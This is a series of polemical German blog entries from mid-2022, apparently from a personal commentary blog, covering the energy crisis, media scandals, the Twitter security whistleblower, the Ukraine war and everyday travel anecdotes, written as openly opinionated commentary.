Oh und noch ein Problem. Der Grund, wieso die Länder alle Erdgas-Kraftwerke gebaut haben, ist nicht nur weil Erdgas schön billig war, sondern weil man die Kraftwerke superschnell an- und abschalten kann. Das Verbundnetz ist Wechselstrom mit 50 Hertz. Wenn die Nachfrage das Angebot übersteigt, dann sinkt die Netzfrequenz. Umgekehrt steigt sie. Damit das internationale Netz überlebt, müssen alle ihre Netzfrequenz auf 50 Hz halten. Erneuerbare Energien liefern aber nicht verlässlich und berechenbar eine bestimmte Menge Strom, sondern man muss das dann halt runterregeln oder entsprechen aufstocken mit Erdgaskraftwerken. Nachdem Deutschland jetzt Kohle und Atomkraft abgeschaltet hat, die die Grundlast stabil geliefert haben, muss Erdgas halt mehr und mehr übernehmen. Wenn Erdgas jetzt prohibitiv teuer wird, kann man das aber nicht rückabwickeln und wieder Kohle machen, denn Kohle und Atomkraft sind nicht schnell genug hoch- und runterregelbar, um die Volatilität von Wind und Solar auszugleichen für die 50 Hz.
So aber jetzt denkt mal weiter. Die ausfallenden Atomkraftwerke wegen zu wenig Wasserspiegel zur Kühlwasserentnahme oder wegen Hitzelimit bei der Wasserabgabe in Flüsse sind ja nun nicht Putins Schuld. Dass sogar die bis dato immer super zuverlässige Wasserkraft jetzt unter dem Klimawandel leidet auch nicht!
Mit anderen Worten: Die Energiekrise gerade hat nur am Rande mit Putin zu tun. Das ist hausgemacht.
Wenn ihr keinen Bock habt, euch auf Twitter durch einen Thread zu arbeiten, dann gibt es hier ein Video einer ZDF-Doku zum Thema.

Thu Sep 15 2022

[l] Als Covid noch frisch war, hat der Bundestag das Mietrecht angepasst. Ladengeschäfte, die keine Geschäfte mehr führen konnten wegen Lockdown und co, durften ihre Mietzahlungen aussetzen.
Adidas hat das damals gemacht. Und dann hat die "Bild"-"Zeitung" eine fette Kampagne gegen sie gefahren.
"Darf ein Weltkonzern einfach keine Miete mehr bezahlen?", "Wie Adidas das Land gegen sich aufbrachte – Chronik einer Blamage", "Gefährliche Kettenreaktion": Mit Überschriften wie diesen machte "Bild" im Frühjahr 2020 Stimmung gegen Adidas. Mehr als 20 solcher Artikel feuerte das Blatt auf den Sportartikelhersteller ab.
Stellt sich raus: Adidas hatte nicht das Land gegen sich aufgebracht, sondern seinen Vermieter. Und das war: Mathias Döpfner, der Axel-Springer-Chef. Der hat dann kurzerhand seinen Angestellten Julian Reichelt angerufen, die "Bild" solle mal schnell eine Kampagne gegen Adidas machen, und das hat die "Bild" dann auch gemacht.

Wed Sep 14 2022

[l] Georgien will angeblich einen Volksentscheid machen, ob man gegen Russland einen Krieg führen soll.
Georgien hat da an sich keine guten Erfahrungen mit gemacht, als es um Abchasien ging. Das war eine ähnliche Situation wie jetzt in der Ukraine damals, nur hatte Georgien viel weniger westliche Hilfe und hat daher verloren.
Aber jetzt, wo sie sehen können, dass die Russen besiegbar sind, könnte man ja auch nochmal über eine Revanche nachdenken. Die sind ja bestimmt geschwächt und so!
Ich hoffe mal, dass das eine Ente ist. Odessa liegt in der Ukraine, vom Odessa Journal würde ich daher erstmal annehmen, dass es ukrainische Kriegspropaganda ist. Das wäre auch eine wirklich schlechte Idee, wenn Georgien jetzt Krieg gegen Russland führt, denn einer der Gründe, wieso der Krieg für Putin so schlecht läuft, ist weil es offiziell kein Krieg sondern nur eine Spezialoperation ist. Das heißt, dass Putin nur Söldner und Freiwillige einsetzen kann, keine Wehrdienstleistenden und keine Generalmobilmachung und kein Einsatz von Atomwaffen, außer jemand marschiert in Russland ein und das ist nicht konventionell zu gewinnen.
Ich weiß ja nicht, wie die Georgier sich das angeblich vorstellen, aber wenn die in Russland einmarschieren, könnte das größere Effekte auslösen, die niemand haben will.

Tue Sep 13 2022

[l] Ich wollte demnächst einen Vortrag halten, in dem ich die Architektur meines Blogs vorstelle. Architektur nicht im Sinne von "ich benutze dieses Framework" sondern im Sinne von: Es gibt diese Komponenten, die so miteinander reden, und das habe ich aus diesen Gründen so gemacht.
Nun fällt mir gerade auf, dass das mehr Erkenntnisgewinn haben könnte, wenn ich es mit typischen Architekturen vergleiche.
Dann könnte man mal zeigen, was es so für Optimierungsdimensionen gibt, und was für Vor- und Nachteile die jeweils in anderen Dimensionen haben. Ich glaube, dass die meisten IT-Entscheider überhaupt keine Grundlage für ihre Entscheidungen haben, sondern eher so nach sozialen Gesichtspunkten entscheiden. Wenn es aussieht, als machen das alle anderen, dann machen wir das besser auch.
Daher hier mal eine kleine Umfrage.
Ich suche Leute, die eine IT-Architektur (ich denke hier in so Jungschen Archetypen-Kategorien wie "PHP-Monolith" vs "Rails-App" vs "Enterprise-Java mit Microservices und Message Bus und Kafka") zu verantworten haben und ihre Entscheidungen so gut finden, dass sie das auch anderen gegenüber vertreten würden.
An die jetzt die Frage: Wie sieht eure Architektur aus (ganz grob, höchstens ein-zwei Absätze)? Was sind aus eurer Sicht die Dimensionen des Problemraums? In welche Richtungen davon habt ihr optimiert, und warum? Wieso glaubt ihr, dass euer Ansatz das sinnvolle Optimum herausholt?
Insbesondere bin ich an nicht offensichtlichen Dimensionen (also andere als Performance, Kosten, Security, Zuverlässigkeit, Wartbarkeit, Monitorbarkeit, Skalierbarkeit), die für euch eine Rolle spielten.
[l] In Zukunft kann man dank "KI" Diversity in Filme nachträglich rein- und rausrendern.
Hey, wieso machen wir nicht einfach direkt für jeden einen dynamisch generierten Film, der nur zeigt, was derjenige gerade sehen wollte? Wer braucht schon Kunst, Anspruch oder Konfrontation mit unbequemen Konzepten im Leben!1!! Lieber alle in ihre eigene Gummizelle, äh, in ihren Safe Space!
Update: Oh wow, gleich der ganze Account weg. Disney hat gerade Die kleine Meerjungfrau neu verfilmt, mit echten Schauspielern, und die Darstellerin für die Titelrolle ist eine Schwarze. In dem Tweet sah man ein Screenshot einer angeblichen KI-Anwendung, die da eine Weiße mit roten Haaren draus gemacht hat, wie in der Cartoonvorlage aussah. m(

Tue Sep 6 2022

[l] Die OPEC reduziert dann mal die Ölfördermenge.
Bislang hat die OPEC in Ölpreiskrisen gerne den Ölhahn aufgedreht, damit die Preise nicht zu krass eskalieren. Das ist ja in deren Interesse, die Länder von ihrem Öl abhängig zu halten. Wenn das zu unerschwinglich wird, investieren die am Ende in Elektroautos oder alternative Energiequellen.
Ja aber wieso machen sie das denn jetzt nicht? Nun, doch, sie hatten es schon gemacht. Jetzt drehen sie die Förderausweitung wieder zurück. Weil, äh, …
Angesichts fallender Preise sah sich die Organisation jedoch gezwungen zu handeln.
Die kriegen zu wenig Geld pro Barrel. Das finde ich ja jetzt doch interessant, denn wenn man sich die Heizölpreisentwickung anschaut (auf "3 Jahre" klicken), dann sieht das eher nicht so aus, als ob da irgendwas sinkt.
Was passiert hier also? Zocken die Raffinerien und Zwischenhändler die Ölproduzenten ab? Sind die Transportkosten krass gestiegen?

Mon Sep 5 2022

[l] Bei diesem Flevoland-Elektromassaker in den Niederlanden war wohl die Ursache, dass jemand von der Bahn den falschen Anschluss verbunden hat. Die Auswirkungen waren u.a., dass eine Hochspannungsleitung sehr heiß wurde und auf der ganzen Strecke zu rauchen anfing. Hier gibt es ein Foto.
Völlig unabhängig davon kam bei mir aber die Frage auf, wieso das mit den Überlandleitungen nach Bayern so ein Problem ist. Die Bahn ist doch im Besitz von zusammenhängen Grundstücken von Nord nach Süd. Könnte man die nicht einfach nehmen und da Stromtrassen verbuddeln? Oder von mir aus über den Gleisen aufhängen. Weiß jemand, wieso das nicht gemacht wird?
Update: Leser schickten folgende Links: Blindleistung, 380-kV-Diagonale Berlin.
Update: Leserbrief:
hab nen Bekannten (arbeitet bei DB Energie) gefragt .. seine Antwort:
Man kann nicht einfach eine Hochspannung-Transportleitung (380kV) entlang einer Bahntrasse verlegen.
1. Planfeststellung
2. Schutzstreifen unter 380kV-Leitung beträgt ca. 60m
3. EMV: Bahn geht durch Wohnbebauung
4. Platzbedarf: Ein solcher HS-Mast braucht 10m x 10m.
5. EMV: Oberleitung ohne HS-Leitung bereits in der Nähe des erlaubten.
6. Bahn ist selten kürzeste Verbindung
EMV steht für Elektromagnetische Verträglichkeit.

Sat Sep 3 2022

[l] So Katastrophen sind ja immer eine tolle Gelegenheit, die Vorsorgemaßnahmen zu prüfen.
Aktueller Datenpunkt aus den Niederlanden:
"Due to a power outage in Flevoland, the Almere data center ran on the UPS," Erik Bais, CEO of local operator A2B Internet said (translated). "Unfortunately the mobile network was also down, which meant that the generator did not start up."
m( (Danke, Carsten)

Wed Aug 31 2022

[l] Wenn ihr euch von dem ganzen Elend da draußen mal mit ein bisschen Twitter-Drama ablenken wollt: Bitte sehr.
Es geht um die Sache mit dem angeblichen Anti-Trans-Vortrag auf der Berliner Langen Nacht der Wissenschaften. Da haben die Trans-Aktivisten (wie üblich bei Hassmobs) gewaltig mit Gülle zu kübeln begonnen, und weil heute nichts mehr unter Hitler-Vergleichen, Israel-die-Existenzberechtigung-Absprechen oder wie in diesem Fall angebliche Holocaust-Leugnung geht, hat sich die gute Frau Vollbrecht per Crowdfunding ein paar Euro Verteidigungsbudget zusammengesammelt und eine einstweilige Verfügung beantragt und bekommen.
Es gab da ein Hashtag, das sich eine Menge Twitter-Hassmobber zu Eigen gemacht haben. Gegen die alle bestehen jetzt Unterlassungsanspüche, wen ich das richtig verstehe.

Mon Aug 29 2022

[l] Wenn ihr mal die ganze stinkende Vorgeschichte zu Uniper nachlesen wollt: Hier, bitte.
E.ON wollte vor 20 Jahren mit Ruhrgas fusionieren, und alle sachkundigen Stellen inklusive Kartellamt waren dagegen. Kanzler Schröders Wirtschaftsminister Werner Müller hat sich darüber hinweggesetzt.
Das klingt doch noch gar nicht so stinkend? Nur bis zum Anschlag inkompetent, wie üblich bei der SPD? Na wartet mal!
Der damalige parteilose Wirtschaftsminister Werner Müller hatte zuvor für eine der Vorgängergesellschaften des Energiekonzerns Veba gearbeitet, der später in E.ON aufging. Er erklärte sich für befangen und überließ es daher seinem Staatssekretär Alfred Tacke, die Erlaubnis zum Zusammenschluss der beiden Energiegrößen zu erteilen.
Und der hat natürlich gemacht, was sein Chef haben wollte.
Stinkt euch noch nicht genug? Dranbleiben!
Die Beteiligten im Ministerium, Müller und Tacke, wechselten nicht allzu lange nach der umstrittenen Entscheidung in Führungspositionen im Verbund der Unternehmen, deren Zusammenschluss sie ermöglicht hatten.
Ach nee.
Naja, und wenn du einen Monopolisten im Gasmarkt hast, dann passiert halt, was bei Monopolen immer passiert. Das ganze Ding investiert nichts mehr, geht in den Powersave-Modus, und investiert nur noch in die Abwehr von nachwachsenden Konkurrenten. Den Rest kann man als Boni und Schmiergelder auszahlen.
Keine Entscheidung muss Konkurrenzdruck überleben, also kann man immer schön da kaufen, wo das meiste Schmiergeld herkommt.
Ja aber was hat das mit Uniper zu tun, wenn E.ON und SPD korrupt sind?
2016 haben die das Gasgeschäft abgespalten, in eine Firma namens Uniper. Das wurde danach mehrheitlich vom finnischen Fortum-Konzern übernommen. Fortum gehört übrigens dem finnischen Staat. Die kennen sich damit aus, unter welchem Umständen der Staat einen Bailout auszahlt. Die sind selber ein Staat.
Update: Im Aufsichtsrat von Fortun sitzt übrigens ein gewisser Philipp Rösler.

Sun Aug 28 2022

[l] Old and busted: Pakistan hat eine Ausschreibung für Gaslieferungen gemacht, keiner hat sich beworben.
New hotness: Den Haag hat eine Ausschreibung für Gaslieferungen gemacht und keiner hat sich beworben. Sie wollen jetzt eine Ausnahmegenehmigung beantragen, dass sie weiter von Gazprom kaufen können. Zumindest für den Dezember.
Die Einschläge kommen näher! (Danke, Detlef)

Sat Aug 27 2022

[l] Was macht der Putin eigentlich mit dem ganzen Erdgas, das er nicht nach Deutschland exportiert gerade?
Ist ja nicht so, als hätte der da große Speicher rumliegen für so eine Gelegenheit.
Stellt sich raus: lässt er einfach abfackeln. Ist auch nicht so einfach. Erdgas kommt ja von selbst aus dem Boden. Ist nicht wie Kohle oder Öl, wo man halt eine Förderpause einlegen kann. D.h. es gibt drei Optionen: Exportieren, abfackeln, oder direkt in die Atmosphäre pusten.
Ist alles scheiße für die Umwelt, denn beim Export wird das ja auch verbrannt und landet als CO2 in der Atmosphäre. Aber abgefackelt als CO2 ist es viel weniger treibhausgasig als in Methan-Form.
Insofern finde ich die Empörung jetzt mal wieder echt lächerlich. Der Putin verbrennt das Gas!!1! Ja, äh, wir hätten das auch verbrannt! Was dachtet ihr denn, was wir damit gemacht hätten?!

Wed Aug 24 2022

[l] Gelegentlich kommt hier eine Meldung vorbei, die so großartig ist, dass ich sie eigentlich komplett zitieren müsste.
Hier ist so eine.
Zwei Typen hatten in Braunschweig eine Straßenbahn genommen und waren nächtens damit herumgefahren, hatten sogar Fahrgäste befördert.
Die Staatsanwaltschaft hat sich das jetzt lang und sorgfältig angeguckt und wird keine Anklage erheben.
Es ist kein Diebstahl und kein Einbruch, weil das Depot keine Schranke hatte und die Bahn nicht verschlossen war. Es ist auch kein gefährlicher Eingriff in den Bahnverkehr, weil sie das nachts gemacht haben. Außerdem braucht man für das Fahren einer solchen Bahn auch keine Genehmigung, d.h. es ist auch nicht Fahren ohne Führerschein. Bleibt noch Landfriedensbruch, aber dafür sehen die nicht genug öffentliches Interesse an einer Verfolgung. Kam ja niemand zu Schaden und sie haben ja sogar Leute befördert.
Sie könnten jetzt noch, festhalten, wegen "unberechtigter Personenbeförderung" vorgehen, was aber nur eine Ordnungswidrigkeit ist. Immerhin aber bis zu 20.000€ Strafe.
[l] Kann mir mal ein Finnland-Kenner erklären, was da gerade abgeht? Ich hielt die immer für ein zivilisiertes Völkchen, aber was die Premierministerin da gerade für eine Hexenjagd erlebt, das geht ja mal gar nicht.
Mich schockiert besonders, dass die das für wichtig genug erachtete, dann wirklich einen Drogentest zu machen. Das hat die Vorwürfe erst aufgewertet zu etwas, auf das man reagiert. Das wird sie nicht gemacht haben, wenn das nicht nötig gewesen wäre.
Was zur Hölle ist denn mit den Finnen los? Die haben die einzige coole Regierungschefin in Europa! Wollen die lieber eine Rentnerverwaltung haben wie wir hier? Eine Frau Merkel?! Vielleicht einen Macron, der ihnen ins Gesicht lügt und sie langsam kaputt-durchneoliberalisiert? Oder wie wäre es mit einem Draghi, der offensichtlich mit der Lage überfordert ist!
Finnland hat als einziges Land ein nukleares Endlager. Finnland hat in der Ukraine-Situation als praktisches einziges Land schnell und souverän reagiert. Finnland hat ein Single-Payer Gesundheitssystem mit einer Kundenzufriedenheit in den Top 5 der Welt. Finnland ist das zufriedenste Land der Welt. Finnland hat das beste Schulsystem der Welt.
Und jetzt kacken die die Premierministerin an, weil die bei einer Party teilgenommen hat?!
Besonders ärgert mich die aktuelle Eskalation. Ein paar Freundinnen von ihr waren zu Besuch und haben dort Oben-Ohne-Bilder von sich gemacht und bei Tiktok hochgeladen. Der Absatz hier macht mir echt Bluthochdruck dabei:
In einem Leitartikel in der einflussreichsten Zeitung des Landes, Helsingin Sanomat, wurde am Dienstag kritisiert, Marin habe anscheinend „die Kontrolle verloren“. Es bestehe das Risiko, dass weitere Menschen Bilder aus ihrem Privatleben veröffentlichen könnten.
Nota bene: Sie war nicht auf dem Foto drauf. What the FUCK?!
Ist das der Karma-Ausgleich? Die Sache, die in Finnland Scheiße ist, als Ausgleich dafür, dass der Rest gut ist? Die Presse?
"Es bestehe Gefahr, dass weitere Menschen Fotos aus ihrem Privatleben veröffentlichen könnten". Ja, äh, das nennt man Freiheit. Leute dürfen Fotos aus ihrem Privatleben veröffentlichen! Das soll so!
Update: Ein Leser schickt noch diesen schönen Clip :-)

Tue Aug 23 2022

[l] Wenn ihr schon immer mal wissen wolltet, wie schlimm es bei Twitter intern zugeht, dann habt ihr jetzt eine gute Gelegenheit.
Twitter hatte vor einer Weile einen Trophäen-Hacker als Security-Chef eingestellt, nicht ahnend, dass sie einen von vielleicht Dreien oder Vieren in den USA erwischt haben, bei denen im Notfall Reste von Rückgrat und Gewissen nachweisbar sind. Mudge, ehemals von The L0pht.
Der kommt übrigens ganz schön rum und war auch ne Weile bei DARPA für IT-Security-Forschung zuständig, ging dann zu Google und 2020 hat ihn Twitter eingestellt. Die hätten den vielleicht vorher mal googeln sollen.
Mudge hat natürlich erstmal alles by the book gemacht und die Probleme intern anzusprechen und zu eskalieren versucht. Der Dank dafür war, dass Twitter ihn im Januar rausgeschmissen hat, angeblich weil sie mit seiner Leistung unzufrieden waren. Gut, dann hat er nichts mehr zu verlieren und packt jetzt als Whistleblower aus, was er so gesehen hat.
Ich finde nichts davon sonderlich überraschend. Intern sind viel zu viele eigentlich privilegierte Schalter und Hebel für Gott und die Welt zugreifbar, sensible Informationen werden nicht sauber geschützt, gelöschte Daten sind häufig gar nicht wirklich gelöscht, etc.
Was das jetzt ein bisschen unangenehm für Twitter macht, ist dass Twitter jahrelang den Aufsichtsbehörden ins Gesicht gelogen hat, wie geil sie das alles ordentlich im Griff haben.
Auch gerade ganz aktuell (der zentrale Zankpunkt zwischen Twitter und Elon Musk): Er meint, Twitter könne gar nicht sagen, wie viele ihrer Accounts Bots sind, und hätten auch gar keinen Grund das herauszufinden. Sie hatten öffentlich aber nicht nur behauptet, sie wüssten das, sie haben Elon Musk gegenüber auch eine Zahl genannt, die dieser bezweifelt und damit seinen Rückzug vom Übernahmeangebot begründet hat. Das ist aber Zufall, sagt ein Vertreter der Whistleblower-Vereinigung, die ihn jetzt begleitet. Seine Whistleblowing-Vorbereitungen laufen schon länger als das Musk-Übernahmeangebot. Aber so einem geschenkten Gaul schaut Musk natürlich nicht ins Maul jetzt :-)
Glaubt übrigens kein Wort von Twitters Gefasel, er sei ein ineffektiver Chef gewesen. Mudge hat bei DARPA so gerockt, dass an seinen Führungsfähigkeiten kein Zweifel besteht.
Some of Zatko's most damning claims spring from his apparently tense relationship with Parag Agrawal, the company's former chief technology officer who was made CEO after Jack Dorsey stepped down last November. According to the disclosure, Agrawal and his lieutenants repeatedly discouraged Zatko from providing a full accounting of Twitter's security problems to the company's board of directors. The company's executive team allegedly instructed Zatko to provide an oral report of his initial findings on the company's security condition to the board rather than a detailed written account, ordered Zatko to knowingly present cherry-picked and misrepresented data to create the false perception of progress on urgent cybersecurity issues, and went behind Zatko's back to have a third-party consulting firm's report scrubbed to hide the true extent of the company's problems.
Dieser Umgang mit Security-Problemen ist meiner Beobachtung nach leider nicht ungewöhnlich für die IT-Industrie. Man kehrt alles unter den Teppich, bis einem der Chinaböller in der Hand explodiert. Dann faselt man was von "wir nehmen das sehr ernst" und "krimineller Energie" und besonders heimtückischen Angreifern und dass man die Polizei eingeschaltet habe und jetzt wegen laufendem Verfahren nichts sagen könne.
[l] Das James Webb Space Telescope hat ein paar wirklich sehenswerte Bilder von Jupiter gemacht. Man sieht beide Polarlichter und sogar die Ringe.

Mon Aug 22 2022

[l] Mann Mann Mann, dieser rbb-Skandal eskaliert ja in einem atemberaubenden Tempo.
Erst hieß es, die ARD-Chefin Schlesinger (kommt gerade vom rbb) habe Skandale am Bein.
Was mit Vorteilsnahme, Untreue, unangemessen fettes Gehalt plus intransparente Bonusausschüttungen, man raunte sogar was von Vetternwirtschaft, dicker Dienstwagen natürlich auch.
Klang aber alles nicht anders als man es überall in der Wirtschaft erwarten würde. Umso bemerkenswerter, dass die ARD da Handlungsbedarf sah und auch noch an die Öffentlichkeit ging damit.
Dann explodierte das plötzlich innerhalb des rbb, als habe jemand ne Weltkriegsbombe gefunden.
Die erste Meldung war, dass der rbb den ARD-Vorsitz niederlegt. Das ist ziemlich einmalig, glaube ich. Dann trat sie als rbb-Intendantin zurück. Dann ermittelte plötzlich die Staatsanwaltschaft.
Das ist auch eher selten, dass sich eine Staatsanwaltschaft in die Nähe einer Verletzung der Pressefreiheit begibt. Die werden da also etwas gewusst haben, nehme ich an, was noch nicht öffentlich war.
Jedenfalls ging es dann Schlag auf Schlag weiter. Die ARD sprach von nötigen Reformen (das ist ein heißes Eisen, das man nur im Notfall rausholt). Dann hieß es, der rbb-Rundfunkrat will sie sofort von ihrem Amt abberufen. Normalerweise wartet man ein paar Tage, bis die Betroffene von sich aus aus gesundheitlichen Gründen zurücktritt. Da war der Rundfunkrat in Not, wenn sie von sich aus den Rauswurf verkündet haben. Am nächsten Tag haben sie das dann gemacht.
Dann hat sich sogar der Landtag mit der Sache befasst. Das ist mal ziemlich krass, denn die Medienanstalten sollen natürlich gerade unabhängig sein von der Politik. Das ist ja gerade die Idee der ganzen Konstruktion.
Dann kam auch noch raus, dass der rbb gelogen hatte, als er behauptete, es gäbe gar keine Boni. Daraufhin trat die rbb-Rundfunkratsvorsitzende zurück.
Jetzt hat auch noch die ARD der rbb-Spitze das Vertrauen entzogen. Man traue ihnen nicht zu, die Sache aufzuklären. Wow. Was für ein Paukenschlag.
Gestern gab es dann auch noch Rücktrittsforderungen gegen die ganze rbb-Spitze, klar.
Und jetzt der aktuelle Höhepunkt: Fristlose Kündigung. Keine Abfindung, keine Ruhegeldzahlungen. Sie soll nicht mal kommissarisch weiterarbeiten, bis der Nachfolger feststeht, sondern ein Interimsintendant soll eingesetzt werden.
Das ist eine Kette von bemerkenswerten Explosionen. Wie krass muss denn da die Aktenlage sein, dass praktisch bei jeder Entscheidung die nukleare Option gewählt wird? Weia!

Tue Aug 16 2022

[l] Opsec für Dummies: Poste keine Fotos von deinem geheimen Unterschlupf in sozialen Medien.
Auf dem Telegram-Foto von diesem russischen Kreml-Apologeten sah man ein verräterisches Schild von dem Hauptquartier der Wagner-Söldner im Donbass, also hat die Ukraine es plattgemacht.

Sun Aug 14 2022

[l] Shout-Out an den RE6 von Westerland nach Hamburg Altona. Wir hatten direkt nach dem Hindenburgdamm einen Hardwareschaden und am Bahnhof musste was repariert werden. Der Lokführer hat bis Altona die 25 Minuten wieder reingefahren, kam sogar knapp vor planmäßiger Ankunftszeit an.
Gut, denkt ihr euch jetzt vielleicht, die werden da die planmäßigen Zeiten großzügig geplant haben.
Nein. Das war eine "Hold my beer"-Situation. Die Zugbegleiterin sagte dann bei jeder Station stolz durch, wie wenig Verspätung jetzt noch übrig ist.
Der Lokführer fährt sonst bestimmt TGV oder A320 oder so.
Auch ansonsten war das eine Bahnfahrt für die Geschichtsbücher. Da stiegen so um die 8 erlebnisorientierte Jugendliche zu, mit einem Oma-Einkauf-Rollator, in dem ein Kasten Bier stand. Die haben natürlich verpeilt, rechtzeitig am Bahnsteig zu sein, und als sie einstiegen, gab es keine Sitzplätze mehr. Die manövrierten dann in dem Wagen ein bisschen vor und ein bisschen zurück und navigierten dann zu der Fahrradzone um das Klo herum und fingen dann da mit einer Spontan-Party an. Musik aus dem Smartphone (erstaunlich starke Lautsprecher heutzutage!), das Bier war am Ende alle, sie tanzten, und es entwickelte sich sogar spontan ein Protokoll mit den anderen Passagieren, wie die Zugang zum Klo kriegen konnte (wo einer von denen abhing aus Platzgründen).
Als die dann in Elmshorn ausstiegen, feierte der Rest der vorderen Wagenhälfte weiter. Einer von denen erklärte stolz, das sei ja auf seiner Liste der Bahn-Partys im vorderen Drittel gewesen gerade, und sie hätten 3 Flaschen Korn leergemacht. Wie lang die Liste sei? Zweistellig. Vorne eine 3.
Ich als Berliner bin ja normalerweise nicht so beeindruckt von Hamburg. Ist ja im Wesentlichen dieselbe Stadt wie Westberlin, aber halt die Version von vor der Erfindung von Müllabfuhr und Straßenführung. Der ÖPNV war mir bisher noch nicht negativ aufgefallen, aber heute wollten wir vom Berliner Tor zum Bahnhof Altona und das war eine durchgehende Baustelle mit zweimal Umsteigen und 10 Minuten sinnlos rumwarten in der Mitte und so provisorischen Holztreppen und falschen Wegweisern.
Aber hey, Hamburg, Respekt wo ihr ihn euch verdient habt. Dieser Lokführer und die Party-Jungs haben echt Punkte gutgemacht für euch.
Die berüchtigten Punks auf Sylt haben vor der Dorfkirche ein Antifa-Zeltlager aufgebaut und die Gegend mit grenzwertigen Aufklebern dekoriert.
Oh, noch ein Shout-Out: Sylt verkraftet gefühlt ein-zwei Größenordnungen mehr Besucher als sie haben sollten. Die Infrastruktur ist am Limit aber sie hält. Respekt für die Busbetreiber! Ein paar kräftige Klimaanlagen wären aber schön gewesen.

Thu Aug 11 2022

[l] Es ist an der Zeit für ein fettes Fuck You an die amerikanische Security-Szene für diese Glanzleistung:
Den "uncoolsten" Umgang mit einer beziehungsweise mehreren Schwachstelle(n) muss sich in diesem Jahr Google vorwerfen lassen. Sein Top-Security-Team "Google TAG" erhielt den "Lamest Vendor Award", einen Preis, der bei Fans der Pwnie Awards besonders beliebt ist. Durch das Schließen von elf Zero-Day-Schwachstellen torpedierte das Google-Team eine laufende Anti-Terror-Operation westlicher Geheimdienste ("unilaterally shutting down a counterterrorism operation").
Wat? Alter, tickt ihr noch richtig oder was?!
Wir sind hier die Guten und daher ist es lame, von uns ausgenutzte Sicherheitslücken zu schließen?!
Fuck you!
Da merkst du halt, dass die Szene bei den Amis zum Gutteil aus FBI, NSA oder CIA besteht. Da können die hundertmal "Ex-" sagen, den Gestank wirst du halt nicht durch Erklärung der Beendigung des Arbeitsverhältnisses los.
Nein, Leute, Sicherheitslücken gehören sofort zugemacht. Alle. Für jeden.

Tue Aug 9 2022

[l] Ihr habt bestimmt gesehen, dass das FBI bei Donald Trump in Florida eine Hausdurchsuchung gemacht hat.
Aber habt ihr auch gesehen, was der Grund war?
Sie haben ermittelt, weil Trump Akten aus seiner Amtszeit mitgenommen hat.
Ich bin hier hoffentlich nicht der einzige, der direkt an Gaby Weber und ihren Kampf gegen die Windmühlen der Aktenmitnehmer und der keinen Grund zum Eingreifen sehenden Justiz denken musste.

Fri Aug 5 2022

[l] Leserbrief zu den kaputtgealtmaierten erneuerbaren Energien:
Nichts gegen das Verb "kaputtgealtmaiert", das hat Altmaier sicher verdient und die CDU auch. Ich möchte nur dem Eindruck entgegenwirken, dass er das im Alleingang gemacht hat. Der sog. "Solar-Deckel", also die Deckelung der Förderung von Solaranlagen, wurde 2012 von Philipp Rösler nach Vorarbeit von Rainer Brüderle eingeführt, hat massiv Investitionen gehemmt und die Branche weitflächig zurückgebaut. Dieses Erfolgsmodell hat Sigmar Gabiel 2016 mit dem "Ausschreibungsmodell" auf die Windenergie übertragen, das eigentlich zu mehr Effizienz führen sollte, aber faktisch eine jährliche Ausbauobergrenze ist, ab der nicht mehr gefördert wird. Das hat dem Ausbau extrem geschadet und an vielen Standorten bereits laufende Planungen zum Abbruch gezwungen.
Man sollte also ergänzen, dass die Erneuerbaren Energien nicht nur gealtmaiert, sondern auch zerröslert und gegabrielt wurden. (Von der regionalen Bilanz der CSU sehen wir jetzt einmal ab.)
Komm, das schmeißen wir lieber weg. Das ist schon ganz angegabrielt.

Thu Aug 4 2022

[l] Gute Nachrichten! Der Atomkrieg ist abgewendet! Uri Geller schreibt einen einen offenen Warnbrief an Putin. Money Quote:
I will use every last molecule of my Mind Power to prevent you from launching a nuclear attack!
Phew! Ich hatte mir schon Sorgen gemacht.

Wed Aug 3 2022

[l] Krass. Ich dachte, im Ukrainekrieg sei die Propaganda direkt von Farce zu unerträglich übergegangen.
Aber jetzt? "China betreibt aggressiven Expansionskurs"
Peking will die Herzen der Menschen vergiften
Mir persönlich reicht ja schon, wie die Pelosi mit ihrem heldenhaften Heldenbesuch wartet, bis die Ukraine China deutlich gezeigt hat, dass ein Einmarsch in Taiwan keine Option ist. Dann fliegt sie in einer Nacht- und Nebelaktion hin, erwähnt heldenhaft mit keinem Wort, dass Taiwan ein eigenes Land sei, und lässt sich für diese erbärmliche Billignummer jetzt auch noch als Heldin feiern. Ich fasse es nicht.
So sieht Politik aus, wenn man sie bei Wish bestellt, ja?
Mann ist das alles zum Fremdschämen.
Boah haben wir es den Chinesen jetzt aber gezeigt, wa? Aber mal so richtig, Alter!!
Na da bin ich ja mal gespannt, ob Europa sich da auch in amerikanische Selbstverstümmelungs-Sanktionen reinziehen lässt. Unsere Regierung ist gerade dämlich genug, dass ich das für möglich halte. Hey, wer braucht schon Smartphones, Computer oder andere Elektronik. Oder Kleidung. Oder seltene Erden.
Übrigens, wo ich gerade selbstverstümmelnde Sanktionen ansprach. Wo bleibt eigentlich der Mistgabelmob vor den Privathäusern der zuständigen Politiker, die 30 Jahre lang verhindert haben, dass wir ordentlich Wind- und Solarstrom haben und nicht mehr mit Gas heizen müssen? Russland erzwingt bei uns nur die Umstellung, die eh schon laaaaange nötig war, und wir wussten es alle. Wieso hat das keiner gemacht? Dann könnten wir das jetzt alles einfach aussitzen.
OK, Mistgabelmob gibt es bei uns nicht. Rasen betreten ist verboten. Aber zumindest ein vorsichtiges Wort der Kritik?

Sun Jul 31 2022

[l] Ich bin heute zwei Stunden durch die Gegend geirrt auf der Suche nach einem Geldautomaten, der einem keine 5€ Gebühren aufdrückt.
Inzwischen ist das Post- und Bankfilialensterben soweit fortgeschritten, dass man im Grunde von einer abgeschlossenen Bargeldabschaffung reden kann. Bei mir in der direkten Umgebung haben zwei Post- und fünf Bankfilialen zugemacht, bei denen ich früher gebührenfrei Geld am Automaten ziehen konnte.
Nach ca. zwei Stunden Fußweg hab ich dann am Ende doch noch eine Postbankfiliale gefunden, und die hatte noch einen (EINEN!) Automaten offen. Drei weitere Automaten dort, aber keiner davon konnte abheben.
An dem einen Automaten versuchte gerade eine Ukrainerin Geld abzuheben und bat mich dann um Hilfe, als das scheiterte. Die hatte ein Postbankkonto eröffnet und eine Karte und eine Pin zugeschickt gekriegt. Aber die Pin war die Online-Pin, nicht die Karten-Pin. Mit der kam sie nicht weit. Alles Papier der Postbank war ... auf Deutsch. Ich bin erstaunt, dass sie überhaupt so weit gekommen ist, ehrlich gesagt.
